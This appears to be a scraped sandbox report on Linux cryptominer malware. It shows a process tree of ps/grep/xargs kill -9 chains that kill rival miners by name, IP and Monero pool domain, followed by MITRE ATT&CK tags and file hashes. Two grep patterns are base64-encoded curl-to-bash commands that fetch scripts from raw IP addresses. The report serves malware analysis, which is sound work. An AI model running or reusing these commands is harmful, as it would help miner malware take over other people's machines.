/bin/grepgrep -v grep2⤵PID:2271
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2270 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2280
-
/usr/bin/cutcut -c 9-152⤵PID:2279
-
/bin/grepgrep sync_supers2⤵PID:2278
-
/bin/grepgrep -v grep2⤵PID:2277
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2276 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2285
-
/usr/bin/cutcut -c 9-152⤵PID:2284
-
/bin/grepgrep cpuset2⤵PID:2283
-
/bin/grepgrep -v grep2⤵PID:2282
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2281 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2291
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2290
-
/bin/grepgrep "x]"2⤵PID:2289
-
/bin/grepgrep -v aux2⤵PID:2288
-
/bin/grepgrep -v grep2⤵PID:2287
-
/bin/psps aux2⤵
- Process Discovery
PID:2286 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2297
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2296
-
/bin/grepgrep "sh] <"2⤵PID:2295
-
/bin/grepgrep -v aux2⤵PID:2294
-
/bin/grepgrep -v grep2⤵PID:2293
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2292 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2303 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2302
-
/bin/grepgrep " \\[]"2⤵PID:2301
-
/bin/grepgrep -v aux2⤵PID:2300
-
/bin/grepgrep -v grep2⤵PID:2299
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2298 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2308
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2307
-
/bin/grepgrep /tmp/l.sh2⤵PID:2306
-
/bin/grepgrep -v grep2⤵PID:2305
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2304 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2313
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2312
-
/bin/grepgrep /tmp/zmcat2⤵PID:2311
-
/bin/grepgrep -v grep2⤵PID:2310
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2309 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2318 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2317
-
/bin/grepgrep hahwNEdB2⤵PID:2316
-
/bin/grepgrep -v grep2⤵PID:2315
-
/bin/psps aux2⤵
- Process Discovery
PID:2314 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2323
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2322
-
/bin/grepgrep CnzFVPLF2⤵PID:2321
-
/bin/grepgrep -v grep2⤵PID:2320
-
/bin/psps aux2⤵PID:2319
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2328
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2327
-
/bin/grepgrep CvKzzZLs2⤵PID:2326
-
/bin/grepgrep -v grep2⤵PID:2325
-
/bin/psps aux2⤵PID:2324
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2333
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2332
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:2331 -
/bin/grepgrep -v grep2⤵PID:2330
-
/bin/psps aux2⤵PID:2329
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2338
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2337
-
/bin/grepgrep /tmp/udevd2⤵PID:2336
-
/bin/grepgrep -v grep2⤵PID:2335
-
/bin/psps aux2⤵PID:2334
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2343
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2342
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵PID:2341
-
/bin/grepgrep -v grep2⤵PID:2340
-
/bin/psps aux2⤵PID:2339
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2348
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2347
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵PID:2346
-
/bin/grepgrep -v grep2⤵PID:2345
-
/bin/psps aux2⤵
- Process Discovery
PID:2344 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2353
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2352
-
/bin/grepgrep sustse2⤵PID:2351
-
/bin/grepgrep -v grep2⤵PID:2350
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2349 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2358
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2357
-
/bin/grepgrep sustse32⤵PID:2356
-
/bin/grepgrep -v grep2⤵PID:2355
-
/bin/psps aux2⤵PID:2354
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2364
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2363
-
/bin/grepgrep wget2⤵PID:2362
-
/bin/grepgrep mr.sh2⤵PID:2361
-
/bin/grepgrep -v grep2⤵PID:2360
-
/bin/psps aux2⤵PID:2359
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2370
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2369
-
/bin/grepgrep curl2⤵PID:2368
-
/bin/grepgrep mr.sh2⤵PID:2367
-
/bin/grepgrep -v grep2⤵PID:2366
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2365 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2376
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2375
-
/bin/grepgrep wget2⤵PID:2374
-
/bin/grepgrep 2mr.sh2⤵PID:2373
-
/bin/grepgrep -v grep2⤵PID:2372
-
/bin/psps aux2⤵PID:2371
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2382 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2381
-
/bin/grepgrep curl2⤵PID:2380
-
/bin/grepgrep 2mr.sh2⤵PID:2379
-
/bin/grepgrep -v grep2⤵PID:2378
-
/bin/psps aux2⤵
- Process Discovery
PID:2377 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2388
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2387
-
/bin/grepgrep wget2⤵PID:2386
-
/bin/grepgrep cr5.sh2⤵PID:2385
-
/bin/grepgrep -v grep2⤵PID:2384
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2383 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2394
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2393
-
/bin/grepgrep curl2⤵PID:2392
-
/bin/grepgrep cr5.sh2⤵PID:2391
-
/bin/grepgrep -v grep2⤵PID:2390
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2389 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2400
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2399
-
/bin/grepgrep wget2⤵PID:2398
-
/bin/grepgrep logo9.jpg2⤵PID:2397
-
/bin/grepgrep -v grep2⤵PID:2396
-
/bin/psps aux2⤵
- Process Discovery
PID:2395 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2406
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2405
-
/bin/grepgrep curl2⤵PID:2404
-
/bin/grepgrep logo9.jpg2⤵PID:2403
-
/bin/grepgrep -v grep2⤵PID:2402
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2401 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2411
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2410
-
/bin/grepgrep j2.conf2⤵PID:2409
-
/bin/grepgrep -v grep2⤵PID:2408
-
/bin/psps aux2⤵PID:2407
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2417
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2416
-
/bin/grepgrep wget2⤵PID:2415
-
/bin/grepgrep luk-cpu2⤵PID:2414
-
/bin/grepgrep -v grep2⤵PID:2413
-
/bin/psps aux2⤵
- Process Discovery
PID:2412 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2423
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2422
-
/bin/grepgrep curl2⤵PID:2421
-
/bin/grepgrep luk-cpu2⤵PID:2420
-
/bin/grepgrep -v grep2⤵PID:2419
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2418 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2429
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2428
-
/bin/grepgrep wget2⤵PID:2427
-
/bin/grepgrep ficov2⤵PID:2426
-
/bin/grepgrep -v grep2⤵PID:2425
-
/bin/psps aux2⤵PID:2424
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2435
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2434
-
/bin/grepgrep curl2⤵PID:2433
-
/bin/grepgrep ficov2⤵PID:2432
-
/bin/grepgrep -v grep2⤵PID:2431
-
/bin/psps aux2⤵PID:2430
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2441
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2440
-
/bin/grepgrep wget2⤵PID:2439
-
/bin/grepgrep he.sh2⤵PID:2438
-
/bin/grepgrep -v grep2⤵PID:2437
-
/bin/psps aux2⤵PID:2436
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2447
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2446
-
/bin/grepgrep curl2⤵PID:2445
-
/bin/grepgrep he.sh2⤵PID:2444
-
/bin/grepgrep -v grep2⤵PID:2443
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2442 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2453
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2452
-
/bin/grepgrep wget2⤵PID:2451
-
/bin/grepgrep miner.sh2⤵PID:2450
-
/bin/grepgrep -v grep2⤵PID:2449
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2448 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2459 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2458
-
/bin/grepgrep curl2⤵PID:2457
-
/bin/grepgrep miner.sh2⤵PID:2456
-
/bin/grepgrep -v grep2⤵PID:2455
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2454 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2465
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2464
-
/bin/grepgrep wget2⤵PID:2463
-
/bin/grepgrep nullcrew2⤵PID:2462
-
/bin/grepgrep -v grep2⤵PID:2461
-
/bin/psps aux2⤵
- Process Discovery
PID:2460 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2471 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2470
-
/bin/grepgrep curl2⤵PID:2469
-
/bin/grepgrep nullcrew2⤵PID:2468
-
/bin/grepgrep -v grep2⤵PID:2467
-
/bin/psps aux2⤵
- Process Discovery
PID:2466 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2476
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2475
-
/bin/grepgrep 107.174.47.1562⤵PID:2474
-
/bin/grepgrep -v grep2⤵PID:2473
-
/bin/psps aux2⤵
- Process Discovery
PID:2472 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2481
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2480
-
/bin/grepgrep 83.220.169.2472⤵PID:2479
-
/bin/grepgrep -v grep2⤵PID:2478
-
/bin/psps aux2⤵
- Process Discovery
PID:2477 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2486
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2485
-
/bin/grepgrep 51.38.203.1462⤵PID:2484
-
/bin/grepgrep -v grep2⤵PID:2483
-
/bin/psps aux2⤵
- Process Discovery
PID:2482 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2491
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2490
-
/bin/grepgrep 144.217.45.452⤵PID:2489
-
/bin/grepgrep -v grep2⤵PID:2488
-
/bin/psps aux2⤵
- Process Discovery
PID:2487 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2496
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2495
-
/bin/grepgrep 107.174.47.1812⤵PID:2494
-
/bin/grepgrep -v grep2⤵PID:2493
-
/bin/psps aux2⤵PID:2492
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2501
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2500
-
/bin/grepgrep 176.31.6.162⤵PID:2499
-
/bin/grepgrep -v grep2⤵PID:2498
-
/bin/psps aux2⤵PID:2497
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2506
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2505
-
/bin/grepgrep mine.moneropool.com2⤵PID:2504
-
/bin/grepgrep -v grep2⤵PID:2503
-
/bin/psps auxf2⤵PID:2502
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2511 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2510
-
/bin/grepgrep pool.t00ls.ru2⤵PID:2509
-
/bin/grepgrep -v grep2⤵PID:2508
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2507 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2516
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2515
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵PID:2514
-
/bin/grepgrep -v grep2⤵PID:2513
-
/bin/psps auxf2⤵PID:2512
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2521
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2520
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵PID:2519
-
/bin/grepgrep -v grep2⤵PID:2518
-
/bin/psps auxf2⤵
- Reads CPU attributes
PID:2517 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2526
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2525
-
/bin/grepPID:2524
-
/bin/grepgrep -v grep2⤵PID:2523
-
/bin/psps auxf2⤵PID:2522
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2531 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2530
-
/bin/grepgrep monerohash.com2⤵PID:2529
-
/bin/grepgrep -v grep2⤵PID:2528
-
/bin/psps auxf2⤵PID:2527
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2536 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2535
-
/bin/grepgrep /tmp/a7b104c2702⤵PID:2534
-
/bin/grepgrep -v grep2⤵PID:2533
-
/bin/psps auxf2⤵
- Reads runtime system information
PID:2532 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2541
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2540
-
/bin/grepgrep xmr.crypto-pool.fr:66662⤵PID:2539
-
/bin/grepgrep -v grep2⤵PID:2538
-
/bin/psps auxf2⤵PID:2537
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2546
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2545
-
/bin/grepgrep xmr.crypto-pool.fr:77772⤵PID:2544
-
/bin/grepgrep -v grep2⤵PID:2543
-
/bin/psps auxf2⤵PID:2542
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2551 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2550
-
/bin/grepgrep xmr.crypto-pool.fr:4432⤵PID:2549
-
/bin/grepgrep -v grep2⤵PID:2548
-
/bin/psps auxf2⤵
- Reads runtime system information
PID:2547 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2556
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2555
-
/bin/grepgrep stratum.f2pool.com:88882⤵PID:2554
-
/bin/grepgrep -v grep2⤵PID:2553
-
/bin/psps auxf2⤵PID:2552
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2561
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2560
-
/bin/grepgrep xmrpool.eu2⤵PID:2559
-
/bin/grepgrep -v grep2⤵PID:2558
-
/bin/psps auxf2⤵PID:2557
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2565
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Indicator Removal
1Clear Linux or Mac System Logs
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5727479ef7cedf30c03459bec7d87b0f0
SHA12082e7f715f058acab2398d25d135cf5f4c0ce41
SHA25629872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA5124cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba